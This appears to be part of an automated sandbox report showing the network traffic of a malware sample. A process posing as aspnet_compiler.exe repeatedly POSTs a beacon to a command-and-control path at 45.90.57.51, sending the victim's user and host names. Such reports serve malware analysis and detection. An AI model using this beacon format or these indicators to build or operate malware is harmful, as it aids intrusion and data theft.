May 16, 2024 00:38:27.083594084 CEST	49762	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:27.085627079 CEST	49762	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:27.318443060 CEST	80	49762	45.90.57.51	192.168.2.5
May 16, 2024 00:38:27.318540096 CEST	49762	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:27.551465988 CEST	80	49762	45.90.57.51	192.168.2.5
May 16, 2024 00:38:27.575263977 CEST	80	49762	45.90.57.51	192.168.2.5
May 16, 2024 00:38:27.575279951 CEST	80	49762	45.90.57.51	192.168.2.5
May 16, 2024 00:38:27.575349092 CEST	49762	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:27.575382948 CEST	49762	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:27.808176041 CEST	80	49762	45.90.57.51	192.168.2.5
May 16, 2024 00:38:28.710491896 CEST	49763	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:28.949769974 CEST	80	49763	45.90.57.51	192.168.2.5
May 16, 2024 00:38:28.949872971 CEST	49763	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:28.951649904 CEST	49763	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:29.190588951 CEST	80	49763	45.90.57.51	192.168.2.5
May 16, 2024 00:38:29.190665960 CEST	49763	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:29.429646969 CEST	80	49763	45.90.57.51	192.168.2.5
May 16, 2024 00:38:29.456072092 CEST	80	49763	45.90.57.51	192.168.2.5
May 16, 2024 00:38:29.456088066 CEST	80	49763	45.90.57.51	192.168.2.5
May 16, 2024 00:38:29.456144094 CEST	49763	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:29.456203938 CEST	49763	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:29.695173979 CEST	80	49763	45.90.57.51	192.168.2.5
May 16, 2024 00:38:30.653187990 CEST	49764	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:30.891596079 CEST	80	49764	45.90.57.51	192.168.2.5
May 16, 2024 00:38:30.892734051 CEST	49764	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:30.894418001 CEST	49764	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:31.133104086 CEST	80	49764	45.90.57.51	192.168.2.5
May 16, 2024 00:38:31.136183023 CEST	49764	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:31.374516964 CEST	80	49764	45.90.57.51	192.168.2.5
May 16, 2024 00:38:31.400897026 CEST	80	49764	45.90.57.51	192.168.2.5
May 16, 2024 00:38:31.400917053 CEST	80	49764	45.90.57.51	192.168.2.5
May 16, 2024 00:38:31.401062965 CEST	49764	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:31.401094913 CEST	49764	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:31.639385939 CEST	80	49764	45.90.57.51	192.168.2.5
May 16, 2024 00:38:33.570050955 CEST	49765	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:33.803917885 CEST	80	49765	45.90.57.51	192.168.2.5
May 16, 2024 00:38:33.804022074 CEST	49765	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:33.811515093 CEST	49765	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:34.045082092 CEST	80	49765	45.90.57.51	192.168.2.5
May 16, 2024 00:38:34.045253038 CEST	49765	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:34.278907061 CEST	80	49765	45.90.57.51	192.168.2.5
May 16, 2024 00:38:34.303761959 CEST	80	49765	45.90.57.51	192.168.2.5
May 16, 2024 00:38:34.303776979 CEST	80	49765	45.90.57.51	192.168.2.5
May 16, 2024 00:38:34.303842068 CEST	49765	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:34.303874969 CEST	49765	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:34.537519932 CEST	80	49765	45.90.57.51	192.168.2.5
May 16, 2024 00:38:35.449434042 CEST	49766	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:35.690562010 CEST	80	49766	45.90.57.51	192.168.2.5
May 16, 2024 00:38:35.690819979 CEST	49766	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:35.693093061 CEST	49766	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:35.934561014 CEST	80	49766	45.90.57.51	192.168.2.5
May 16, 2024 00:38:35.934741020 CEST	49766	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:36.175793886 CEST	80	49766	45.90.57.51	192.168.2.5
May 16, 2024 00:38:36.199531078 CEST	80	49766	45.90.57.51	192.168.2.5
May 16, 2024 00:38:36.199546099 CEST	80	49766	45.90.57.51	192.168.2.5
May 16, 2024 00:38:36.199604988 CEST	49766	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:36.199640036 CEST	49766	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:36.440793991 CEST	80	49766	45.90.57.51	192.168.2.5
May 16, 2024 00:38:37.335086107 CEST	49767	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:37.576050997 CEST	80	49767	45.90.57.51	192.168.2.5
May 16, 2024 00:38:37.576148033 CEST	49767	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:37.577907085 CEST	49767	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:37.818468094 CEST	80	49767	45.90.57.51	192.168.2.5
May 16, 2024 00:38:37.818737984 CEST	49767	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:38.059351921 CEST	80	49767	45.90.57.51	192.168.2.5
May 16, 2024 00:38:38.095021009 CEST	80	49767	45.90.57.51	192.168.2.5
May 16, 2024 00:38:38.095036030 CEST	80	49767	45.90.57.51	192.168.2.5
May 16, 2024 00:38:38.095289946 CEST	49767	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:38.095289946 CEST	49767	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:38.335969925 CEST	80	49767	45.90.57.51	192.168.2.5
May 16, 2024 00:38:39.241533995 CEST	49768	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:39.482846022 CEST	80	49768	45.90.57.51	192.168.2.5
May 16, 2024 00:38:39.483068943 CEST	49768	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:39.485061884 CEST	49768	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:39.726262093 CEST	80	49768	45.90.57.51	192.168.2.5
May 16, 2024 00:38:39.726444960 CEST	49768	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:39.967730045 CEST	80	49768	45.90.57.51	192.168.2.5
May 16, 2024 00:38:39.999092102 CEST	80	49768	45.90.57.51	192.168.2.5
May 16, 2024 00:38:39.999108076 CEST	80	49768	45.90.57.51	192.168.2.5
May 16, 2024 00:38:39.999165058 CEST	49768	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:39.999182940 CEST	49768	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:40.240436077 CEST	80	49768	45.90.57.51	192.168.2.5
May 16, 2024 00:38:41.147964001 CEST	49769	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:41.386671066 CEST	80	49769	45.90.57.51	192.168.2.5
May 16, 2024 00:38:41.386781931 CEST	49769	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:41.388890982 CEST	49769	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:41.627513885 CEST	80	49769	45.90.57.51	192.168.2.5
May 16, 2024 00:38:41.627592087 CEST	49769	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:41.866436005 CEST	80	49769	45.90.57.51	192.168.2.5
May 16, 2024 00:38:41.892699957 CEST	80	49769	45.90.57.51	192.168.2.5
May 16, 2024 00:38:41.892788887 CEST	80	49769	45.90.57.51	192.168.2.5
May 16, 2024 00:38:41.892901897 CEST	49769	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:41.892901897 CEST	49769	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:42.131936073 CEST	80	49769	45.90.57.51	192.168.2.5
May 16, 2024 00:38:43.037225962 CEST	49770	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:43.270157099 CEST	80	49770	45.90.57.51	192.168.2.5
May 16, 2024 00:38:43.270369053 CEST	49770	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:43.272419930 CEST	49770	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:43.505177975 CEST	80	49770	45.90.57.51	192.168.2.5
May 16, 2024 00:38:43.505400896 CEST	49770	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:43.738454103 CEST	80	49770	45.90.57.51	192.168.2.5
May 16, 2024 00:38:43.763044119 CEST	80	49770	45.90.57.51	192.168.2.5
May 16, 2024 00:38:43.763061047 CEST	80	49770	45.90.57.51	192.168.2.5
May 16, 2024 00:38:43.763149023 CEST	49770	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:43.763190031 CEST	49770	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:43.995958090 CEST	80	49770	45.90.57.51	192.168.2.5
May 16, 2024 00:38:44.912992954 CEST	49771	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:45.149470091 CEST	80	49771	45.90.57.51	192.168.2.5
May 16, 2024 00:38:45.149554014 CEST	49771	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:45.151547909 CEST	49771	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:45.387909889 CEST	80	49771	45.90.57.51	192.168.2.5
May 16, 2024 00:38:45.387999058 CEST	49771	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:45.624524117 CEST	80	49771	45.90.57.51	192.168.2.5
May 16, 2024 00:38:45.647664070 CEST	80	49771	45.90.57.51	192.168.2.5
May 16, 2024 00:38:45.647680998 CEST	80	49771	45.90.57.51	192.168.2.5
May 16, 2024 00:38:45.647849083 CEST	49771	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:45.647849083 CEST	49771	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:45.884411097 CEST	80	49771	45.90.57.51	192.168.2.5
May 16, 2024 00:38:46.804820061 CEST	49772	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:47.043612003 CEST	80	49772	45.90.57.51	192.168.2.5
May 16, 2024 00:38:47.043720961 CEST	49772	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:47.045717955 CEST	49772	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:47.284423113 CEST	80	49772	45.90.57.51	192.168.2.5
May 16, 2024 00:38:47.284497976 CEST	49772	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:47.523185968 CEST	80	49772	45.90.57.51	192.168.2.5
May 16, 2024 00:38:47.548430920 CEST	80	49772	45.90.57.51	192.168.2.5
May 16, 2024 00:38:47.548451900 CEST	80	49772	45.90.57.51	192.168.2.5
May 16, 2024 00:38:47.548520088 CEST	49772	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:47.548564911 CEST	49772	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:47.787358999 CEST	80	49772	45.90.57.51	192.168.2.5
May 16, 2024 00:38:49.884792089 CEST	49773	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:50.121382952 CEST	80	49773	45.90.57.51	192.168.2.5
May 16, 2024 00:38:50.121503115 CEST	49773	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:50.123310089 CEST	49773	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:50.359729052 CEST	80	49773	45.90.57.51	192.168.2.5
May 16, 2024 00:38:50.359797001 CEST	49773	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:50.596263885 CEST	80	49773	45.90.57.51	192.168.2.5
May 16, 2024 00:38:50.619827986 CEST	80	49773	45.90.57.51	192.168.2.5
May 16, 2024 00:38:50.619844913 CEST	80	49773	45.90.57.51	192.168.2.5
May 16, 2024 00:38:50.619904041 CEST	49773	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:50.619944096 CEST	49773	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:50.856313944 CEST	80	49773	45.90.57.51	192.168.2.5
May 16, 2024 00:38:51.757445097 CEST	49774	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:51.998290062 CEST	80	49774	45.90.57.51	192.168.2.5
May 16, 2024 00:38:51.998395920 CEST	49774	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:52.000180006 CEST	49774	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:52.240910053 CEST	80	49774	45.90.57.51	192.168.2.5
May 16, 2024 00:38:52.240966082 CEST	49774	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:52.481700897 CEST	80	49774	45.90.57.51	192.168.2.5
May 16, 2024 00:38:52.514468908 CEST	80	49774	45.90.57.51	192.168.2.5
May 16, 2024 00:38:52.514503002 CEST	80	49774	45.90.57.51	192.168.2.5
May 16, 2024 00:38:52.514672995 CEST	49774	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:52.514672995 CEST	49774	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:52.755438089 CEST	80	49774	45.90.57.51	192.168.2.5
May 16, 2024 00:38:53.662473917 CEST	49775	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:53.896270037 CEST	80	49775	45.90.57.51	192.168.2.5
May 16, 2024 00:38:53.896378040 CEST	49775	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:53.898130894 CEST	49775	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:54.131948948 CEST	80	49775	45.90.57.51	192.168.2.5
May 16, 2024 00:38:54.132042885 CEST	49775	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:54.365803957 CEST	80	49775	45.90.57.51	192.168.2.5
May 16, 2024 00:38:54.389626026 CEST	80	49775	45.90.57.51	192.168.2.5
May 16, 2024 00:38:54.389652967 CEST	80	49775	45.90.57.51	192.168.2.5
May 16, 2024 00:38:54.389714003 CEST	49775	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:54.389744043 CEST	49775	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:54.623433113 CEST	80	49775	45.90.57.51	192.168.2.5

HTTP Request Dependency Graph

45.90.57.51

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:36:52.383820057 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 180 Connection: close
May 16, 2024 00:36:52.620201111 CEST	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.rualfons134349ALFONS-PCk0FDD42EE188E931437F4FBE2CgSS2l
May 16, 2024 00:36:52.880095959 CEST	228	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:36:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 15 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:36:54.264581919 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 180 Connection: close
May 16, 2024 00:36:54.502151012 CEST	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.rualfons134349ALFONS-PC+0FDD42EE188E931437F4FBE2CSbg2v
May 16, 2024 00:36:54.765763998 CEST	228	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:36:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 15 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:36:55.076783895 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:36:55.320893049 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:36:55.590960979 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:36:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:36:56.970973015 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:36:57.212929964 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:36:57.478820086 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:36:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49708	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:36:58.862052917 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:36:59.103864908 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:36:59.369699001 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:36:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49709	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:00.746099949 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:00.980633020 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:01.238713026 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49710	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:02.627301931 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:02.870373011 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:03.138281107 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49711	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:04.537805080 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:04.782536983 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:05.048280001 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49712	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:07.254937887 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:07.497780085 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:07.768110037 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49713	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:09.170149088 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:09.410101891 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:09.676040888 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49722	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:11.067188978 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:11.308711052 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
